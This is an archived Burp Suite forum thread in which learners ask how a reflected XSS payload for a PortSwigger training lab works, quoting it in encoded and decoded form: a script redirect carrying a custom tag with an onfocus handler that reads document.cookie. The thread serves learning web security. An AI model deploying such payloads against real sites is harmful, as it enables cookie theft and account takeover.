Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

how do i understand how this work ?/ i do not understand how this payload work

aspiringpentester | Last updated: May 13, 2021 07:59AM UTC

ok i do not understand because at the lab's title said all elements/tags were blocked except custom the script tag seemed not to be blocked somehow also i understand that the custom tag was used (xss) in the actual url that was used with the javascript: url encoded* <script> location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x'; </script> url decoded* <script> location = 'https://your-lab-id.web-security-academy.net/?search=<xss id=x onfocus=alert(document.cookie) tabindex=1>#x'; </script> i started to not understand why script woked when it would be filtered then i understand the location but then i got confused again on (tabindex=>#x) so: 1. how did <script> work i ran my burp and saw custom tags like: img2, a2 got 200 response 2: what is tabindex=1>#x i am looking in forward to your response. also another question that came to mind was; Why do i have to go to an exploit server to submit my payload to victim i kinda or maybe understand that you have to copy the your to send to a victim in practical POC but what came to mind was i never had to do that with the first lab which inly required a payload in the search bar. thank you.

Ben, PortSwigger Agent | Last updated: May 13, 2021 08:35AM UTC

Hi, Just to confirm, what is the name of the lab that you are currently trying to solve?

Deepak | Last updated: Sep 01, 2021 09:24AM UTC

Lab: Reflected XSS into HTML context with all tags blocked except custom ones i couldnt get it too. what's <xss and tabindex?

Ben, PortSwigger Agent | Last updated: Sep 01, 2021 01:16PM UTC